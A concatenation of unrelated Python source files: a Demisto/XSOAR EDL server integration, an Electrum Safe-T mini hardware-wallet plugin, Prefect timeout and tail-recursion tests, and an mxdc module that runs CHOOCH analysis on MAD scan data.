if collapse_ips not in [DONT_COLLAPSE, COLLAPSE_TO_CIDR, COLLAPSE_TO_RANGES]:
collapse_ips = try_parse_integer(collapse_ips, EDL_COLLAPSE_ERR_MSG)
if collapse_ips not in [0, 1, 2]:
raise DemistoException(EDL_COLLAPSE_ERR_MSG)
collapse_options = {
0: DONT_COLLAPSE,
1: COLLAPSE_TO_RANGES,
2: COLLAPSE_TO_CIDR
}
collapse_ips = collapse_options[collapse_ips]
return RequestArguments(query, limit, offset, strip_port, drop_invalids, collapse_ips)
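# Sketch of how URL query parameters map onto RequestArguments (illustration
# only, not called). Empty `di`/`sp` values act as boolean flags, and `tr` may
# be given as 0/1/2 instead of the named collapse options.
def _example_request_args():
    flask_like_args = {'n': '50', 's': '0', 'q': 'type:IP', 'sp': '', 'di': '', 'tr': '1'}
    integration_params = {'edl_size': 10000, 'indicators_query': '', 'collapse_ips': DONT_COLLAPSE}
    request_args = get_request_args(flask_like_args, integration_params)
    # -> limit=50, offset=0, url_port_stripping=True, drop_invalids=True,
    #    collapse_ips=COLLAPSE_TO_RANGES
    return request_args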
''' COMMAND FUNCTIONS '''
def test_module(_: Dict, params: Dict):
"""
Validates:
1. Valid port.
2. Valid cache_refresh_rate
"""
get_params_port(params)
on_demand = params.get('on_demand', None)
if not on_demand:
try_parse_integer(params.get('edl_size'), EDL_LIMIT_ERR_MSG) # validate EDL Size was set
query = params.get('indicators_query') # validate indicators_query isn't empty
if not query:
raise ValueError('"Indicator Query" is required. Provide a valid query.')
cache_refresh_rate = params.get('cache_refresh_rate', '')
if not cache_refresh_rate:
raise ValueError(EDL_MISSING_REFRESH_ERR_MSG)
# validate cache_refresh_rate value
range_split = cache_refresh_rate.split(' ')
if len(range_split) != 2:
raise ValueError(EDL_MISSING_REFRESH_ERR_MSG)
try_parse_integer(range_split[0], 'Invalid time value for the Refresh Rate. Must be a valid integer.')
if not range_split[1] in ['minute', 'minutes', 'hour', 'hours', 'day', 'days', 'month', 'months', 'year',
'years']:
raise ValueError(
'Invalid time unit for the Refresh Rate. Must be minutes, hours, days, months, or years.')
parse_date_range(cache_refresh_rate, to_timestamp=True)
run_long_running(params, is_test=True)
return 'ok', {}, {}
def run_long_running(params: Dict, is_test: bool = False):
"""
Start the long running server
:param params: Demisto params
:param is_test: Indicates whether it's test-module run or regular run
:return: None
"""
certificate: str = params.get('certificate', '')
private_key: str = params.get('key', '')
certificate_path = str()
private_key_path = str()
try:
port = get_params_port(params)
ssl_args = dict()
if (certificate and not private_key) or (private_key and not certificate):
raise DemistoException('If using HTTPS connection, both certificate and private key should be provided.')
if certificate and private_key:
certificate_file = NamedTemporaryFile(delete=False)
certificate_path = certificate_file.name
certificate_file.write(bytes(certificate, 'utf-8'))
certificate_file.close()
private_key_file = NamedTemporaryFile(delete=False)
private_key_path = private_key_file.name
private_key_file.write(bytes(private_key, 'utf-8'))
private_key_file.close()
context = SSLContext(PROTOCOL_TLSv1_2)
context.load_cert_chain(certificate_path, private_key_path)
ssl_args['ssl_context'] = context
demisto.debug('Starting HTTPS Server')
else:
demisto.debug('Starting HTTP Server')
server = WSGIServer(('0.0.0.0', port), APP, **ssl_args, log=DEMISTO_LOGGER)
if is_test:
server_process = Process(target=server.serve_forever)
server_process.start()
time.sleep(5)
server_process.terminate()
else:
server.serve_forever()
except SSLError as e:
ssl_err_message = f'Failed to validate certificate and/or private key: {str(e)}'
demisto.error(ssl_err_message)
raise ValueError(ssl_err_message)
except Exception as e:
demisto.error(f'An error occurred in long running loop: {str(e)}')
raise ValueError(str(e))
finally:
if certificate_path:
os.unlink(certificate_path)
if private_key_path:
os.unlink(private_key_path)
def update_edl_command(args: Dict, params: Dict):
"""
Updates the EDL values and format on demand
"""
on_demand = params.get('on_demand')
if not on_demand:
raise DemistoException(
'"Update EDL On Demand" is off. If you want to update the EDL manually please toggle it on.')
limit = try_parse_integer(args.get('edl_size', params.get('edl_size')), EDL_LIMIT_ERR_MSG)
print_indicators = args.get('print_indicators')
query = args.get('query', '')
collapse_ips = args.get('collapse_ips', DONT_COLLAPSE)
url_port_stripping = args.get('url_port_stripping', '').lower() == 'true'
drop_invalids = args.get('drop_invalids', '').lower() == 'true'
offset = try_parse_integer(args.get('offset', 0), EDL_OFFSET_ERR_MSG)
request_args = RequestArguments(query, limit, offset, url_port_stripping, drop_invalids, collapse_ips)
indicators = refresh_edl_context(request_args)
hr = tableToMarkdown('EDL was updated successfully with the following values', indicators,
['Indicators']) if print_indicators == 'true' else 'EDL was updated successfully'
return hr, {}, indicators
def main():
"""
Main
"""
params = demisto.params()
credentials = params.get('credentials') if params.get('credentials') else {}
username: str = credentials.get('identifier', '')
password: str = credentials.get('password', '')
if (username and not password) or (password and not username):
err_msg: str = 'If using credentials, both username and password should be provided.'
demisto.debug(err_msg)
raise DemistoException(err_msg)
command = demisto.command()
demisto.debug(f'Command being called is {command}')
commands = {
'test-module': test_module,
'edl-update': update_edl_command,
}
try:
if command == 'long-running-execution':
run_long_running(params)
elif command in commands:
readable_output, outputs, raw_response = commands[command](demisto.args(), params)
return_outputs(readable_output, outputs, raw_response)
else:
raise NotImplementedError(f'Command "{command}" is not implemented.')
except Exception as e:
err_msg = f'Error in {INTEGRATION_NAME} Integration [{e}]'
return_error(err_msg)
if __name__ in ['__main__', '__builtin__', 'builtins']:
main()
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bip32 import BIP32Node
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device, runs_in_hwd_thread
from electrum.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum.keystore import Hardware_KeyStore
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
from .client import SafeTClient
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
plugin: 'SafeTPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
@runs_in_hwd_thread
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
@runs_in_hwd_thread
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not txin.is_segwit():
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
@runs_in_hwd_thread
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
@runs_in_hwd_thread
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['SafeTClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Sapphire"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
@runs_in_hwd_thread
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
@runs_in_hwd_thread
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_safet_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'SafeTKeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_safet_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype._extend_address_n(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'SafeTKeyStore'):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for out in tx.outputs():
o = t._add_bin_outputs()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
test_executors.py
|
import os
import multiprocessing
import sys
import threading
import time
import pytest
import prefect
from prefect.utilities.exceptions import TaskTimeoutError
from prefect.utilities.executors import (
run_with_thread_timeout,
run_with_multiprocess_timeout,
tail_recursive,
RecursiveCall,
)
# We will test the low-level timeout handlers here and `run_task_with_timeout`
# is covered in `tests.core.test_flow.test_timeout_actually_stops_execution`
# and `tests.engine.test_task_runner.test_timeout_actually_stops_execution`
TIMEOUT_HANDLERS = [run_with_thread_timeout, run_with_multiprocess_timeout]
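# Illustrative usage sketch (not part of the original test suite). The call
# signature is inferred from the tests below: each handler takes the callable,
# optional `args`/`kwargs`, and a `timeout` in seconds, returns the callable's
# result, and raises TaskTimeoutError when the call runs too long.
def _example_timeout_handler_usage():
    # Runs sum([1, 2, 3]) under a generous 5 second thread-based timeout.
    result = run_with_thread_timeout(sum, args=[[1, 2, 3]], timeout=5)
    assert result == 6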
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
@pytest.mark.parametrize("timeout_handler", TIMEOUT_HANDLERS)
def test_timeout_handler_times_out(timeout_handler):
slow_fn = lambda: time.sleep(2)
with pytest.raises(TaskTimeoutError):
timeout_handler(slow_fn, timeout=1)
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
@pytest.mark.parametrize("timeout_handler", TIMEOUT_HANDLERS)
def test_timeout_handler_actually_stops_execution(timeout_handler, tmpdir):
start_path = str(tmpdir.join("started.txt"))
finish_path = str(tmpdir.join("finished.txt"))
if timeout_handler == run_with_thread_timeout:
timeout = 1
wait_time = 1.5
max_overhead = 0.1
else:
timeout = 2.5
wait_time = 3
max_overhead = 2
def slow_fn(start_path, finish_path, wait_time):
with open(start_path, "wb"):
pass
time.sleep(wait_time)
        with open(finish_path, "wb"):
            pass
start_time = time.time()
stop_time = start_time + wait_time + max_overhead
with pytest.raises(TaskTimeoutError):
timeout_handler(
slow_fn, args=(start_path, finish_path, wait_time), timeout=timeout
)
    # Wait until after we're sure the task would have finished naturally
time.sleep(stop_time - time.time())
assert os.path.exists(start_path)
assert not os.path.exists(finish_path)
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
@pytest.mark.parametrize("timeout_handler", TIMEOUT_HANDLERS)
def test_timeout_handler_passes_args_and_kwargs_and_returns(timeout_handler):
def just_return(x, y=None):
return x, y
assert timeout_handler(
just_return, args=[5], kwargs=dict(y="yellow"), timeout=10
) == (
5,
"yellow",
)
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
@pytest.mark.parametrize("timeout_handler", TIMEOUT_HANDLERS)
def test_timeout_handler_doesnt_swallow_bad_args(timeout_handler):
def do_nothing(x, y=None):
return x, y
with pytest.raises(TypeError):
timeout_handler(do_nothing, timeout=10)
with pytest.raises(TypeError):
timeout_handler(do_nothing, args=[5], kwargs=dict(z=10), timeout=10)
with pytest.raises(TypeError):
timeout_handler(do_nothing, args=[5], kwargs=dict(y="s", z=10), timeout=10)
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
@pytest.mark.parametrize("timeout_handler", TIMEOUT_HANDLERS)
def test_timeout_handler_reraises(timeout_handler):
def do_something():
raise ValueError("test")
with pytest.raises(ValueError, match="test"):
timeout_handler(do_something, timeout=10)
# Define a top-level helper function for a null-op process target, must be defined
# as a non-local for the python native pickler used within `my_process`
def do_nothing():
return None
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
@pytest.mark.parametrize("timeout_handler", TIMEOUT_HANDLERS)
def test_timeout_handler_allows_function_to_spawn_new_process(timeout_handler):
def my_process():
        p = multiprocessing.Process(target=do_nothing)
p.start()
p.join()
p.terminate()
return "hello"
assert timeout_handler(my_process, timeout=10) == "hello"
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
@pytest.mark.parametrize("timeout_handler", TIMEOUT_HANDLERS)
def test_timeout_handler_allows_function_to_spawn_new_thread(timeout_handler):
def my_thread():
t = threading.Thread(target=lambda: 5)
t.start()
t.join()
return "hello"
assert timeout_handler(my_thread, timeout=10) == "hello"
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
@pytest.mark.parametrize("timeout_handler", TIMEOUT_HANDLERS)
def test_timeout_handler_doesnt_do_anything_if_no_timeout(timeout_handler):
assert timeout_handler(lambda: 4) == 4
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
@pytest.mark.parametrize("timeout_handler", TIMEOUT_HANDLERS)
def test_timeout_handler_preserves_context(timeout_handler):
def my_fun(x, **kwargs):
return prefect.context.get("test_key")
with prefect.context(test_key=42):
res = timeout_handler(my_fun, args=[2], timeout=10)
assert res == 42
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
def test_run_with_thread_timeout_preserves_logging(caplog):
run_with_thread_timeout(prefect.Flow("logs").run, timeout=10)
assert len(caplog.messages) >= 2 # 1 INFO to start, 1 INFO to end
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
def test_run_with_multiprocess_timeout_preserves_logging(capfd):
"""
Requires fd capturing because the subprocess output won't be captured by caplog
"""
run_with_multiprocess_timeout(prefect.Flow("logs").run, timeout=10)
stdout = capfd.readouterr().out
assert "Beginning Flow run" in stdout
assert "Flow run SUCCESS" in stdout
def test_recursion_go_case():
@tail_recursive
def my_func(a=0):
if a > 5:
return a
raise RecursiveCall(my_func, a + 2)
assert 6 == my_func()
def test_recursion_beyond_python_limits():
RECURSION_LIMIT = sys.getrecursionlimit()
@tail_recursive
def my_func(calls=0):
if calls > RECURSION_LIMIT + 10:
return calls
raise RecursiveCall(my_func, calls + 1)
assert my_func() == RECURSION_LIMIT + 11
def test_recursion_nested():
def utility_func(a):
if a > 5:
return a
raise RecursiveCall(my_func, a + 2)
@tail_recursive
def my_func(a=0):
return utility_func(a)
assert 6 == my_func()
def test_recursion_multiple():
call_checkpoints = []
@tail_recursive
def a_func(a=0):
call_checkpoints.append(("a", a))
if a > 5:
return a
a = b_func(a + 1)
raise RecursiveCall(a_func, (a + 1) * 2)
@tail_recursive
def b_func(b=0):
call_checkpoints.append(("b", b))
if b > 5:
return b
b = a_func(b + 2)
raise RecursiveCall(b_func, b + 2)
assert a_func() == 42 # :)
assert call_checkpoints == [
("a", 0),
("b", 1),
("a", 3),
("b", 4),
("a", 6),
("b", 8),
("a", 18),
("b", 20),
("a", 42),
]
def test_recursion_raises_when_not_decorated():
call_checkpoints = []
@tail_recursive
def a_func(a=0):
call_checkpoints.append(("a", a))
if a > 5:
return a
a = b_func(a + 1)
raise RecursiveCall(a_func, (a + 1) * 2)
def b_func(b=0):
call_checkpoints.append(("b", b))
if b > 5:
return b
b = a_func(b + 2)
raise RecursiveCall(b_func, b + 2)
with pytest.raises(RecursionError):
assert a_func()
assert call_checkpoints == [("a", 0), ("b", 1), ("a", 3), ("b", 4), ("a", 6)]
|
chooch.py
|
import os
import re
import subprocess
import threading
import numpy
from mxdc.utils import converter
from mxdc.utils.log import get_module_logger
from mxdc import Engine
logger = get_module_logger(__name__)
class AutoChooch(Engine):
"""An event driven engines for performing analysis of MAD Scans with CHOOCH.
"""
def __init__(self):
super().__init__()
self.results = {}
def configure(self, config, data, uname=None):
"""
        Prepare the CHOOCH run
:param config: a dictionary containing the MAD-Scan configuration
:param data: a numpy array containing the raw data
:param uname: optional username
:return:
"""
self.config = config
self.data = numpy.dstack([data['energy'] * 1000, data['normfluor']])[0]
self.inp_file = os.path.join(self.config['directory'], "{}.dat".format(self.config['name']))
self.esf_file = os.path.join(self.config['directory'], "{}.esf".format(self.config['name']))
self.out_file = os.path.join(self.config['directory'], "{}.out".format(self.config['name']))
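    # Illustrative usage sketch (not from the original module). `data` is expected
    # to be a structured array with 'energy' (keV) and 'normfluor' fields, and
    # `config` must provide at least 'directory', 'name' and 'edge' (e.g. 'Se-K');
    # the field and key names are taken from configure() above and run() below.
    #
    #   chooch = AutoChooch()
    #   chooch.configure({'directory': '/tmp', 'name': 'scan1', 'edge': 'Se-K'}, data)
    #   chooch.start()   # emits 'done' (and possibly 'error') when finished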
def start(self):
"""Start the analysis asynchronously. Use signals to determine completion/failure."""
worker = threading.Thread(target=self.run)
worker.setName('AutoChooch')
worker.setDaemon(True)
worker.start()
def run(self):
self.results = {}
element, edge = self.config['edge'].split('-')
self.prepare_input()
try:
output = subprocess.check_output([
'chooch', '-e', element, '-a', edge, self.inp_file, '-o', self.esf_file
], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
# Chooch sometimes exits with non-zero
logger.error(e.output)
else:
self.read_results(output.decode('utf-8'))
finally:
#os.remove(self.inp_file)
self.emit('done', None)
return self.results
def prepare_input(self):
with open(self.inp_file, 'w') as handle:
handle.write('#CHOOCH INPUT DATA\n%d\n' % len(self.data[:,0]))
numpy.savetxt(handle, self.data, fmt='%0.2f')
def read_results(self, output):
try:
data = numpy.genfromtxt(
self.esf_file, comments="#", dtype={'names': ['energy', 'fpp', 'fp'], 'formats': [float, float, float]}
)
data['energy'] *= 1e-3 # convert back to keV
self.results['esf'] = data
except IOError as e:
logger.error(e)
            self.emit('error', 'CHOOCH Failed.')
return
# extract MAD wavelengths from output
r = re.compile(
r'\|\s+(?P<label>[^|]+)\s+\|\s+(?P<wavelength>(?P<energy>\d+\.\d+))\s+'
r'\|\s+(?P<fpp>-?\d+\.\d+)\s+\|\s+(?P<fp>-?\d+\.\d+)\s+\|'
)
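        # Illustrative example (values made up): the regex above is meant to match
        # CHOOCH summary-table rows of the form
        #   | peak |  12661.90 |   8.55 |  -6.91 |
        # capturing the label, the energy in eV (also reused as the raw
        # 'wavelength' field before conversion below), f'' and f'.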
energies = [m.groupdict() for m in r.finditer(output)]
converters = {
'energy': lambda x: float(x)*1e-3,
'wavelength': lambda x: converter.energy_to_wavelength(float(x)*1e-3),
'fpp': float,
'fp': float,
'label': lambda x: x
}
choices = [
{key: converters[key](value) for key, value in list(dataset.items())}
for dataset in energies
]
if choices:
# select remote energy, maximize f" x delta-f'
infl = choices[1]
sel = self.results['esf']['energy'] < (infl['energy'] + 0.1)
sel &= self.results['esf']['energy'] > (infl['energy'] + 0.05)
fpp = self.results['esf']['fpp'][sel]
fp = self.results['esf']['fp'][sel]
energy = self.results['esf']['energy'][sel]
opt = fpp * (fp - infl['fp'])
opt_i = opt.argmax()
choices.append({
'label': 'remo', 'energy': energy[opt_i], 'fpp': fpp[opt_i], 'fp': fp[opt_i],
'wavelength': converter.energy_to_wavelength(energy[opt_i])
})
# new_output = "Selected Energies for 3-Wavelength MAD data \n"
# new_output +="and corresponding anomalous scattering factors.\n"
# new_output += "+------+------------+----------+--------+--------+\n"
# new_output += "| | wavelength | energy | f'' | f' |\n"
# for choice in choices:
# new_output += '| {label:4s} | {wavelength:10.5f} | {energy:8.5f} | {fpp:6.2f} | {fp:6.2f} |\n'.format(
# **choice
# )
# new_output += "+------+------------+----------+--------+--------+\n"
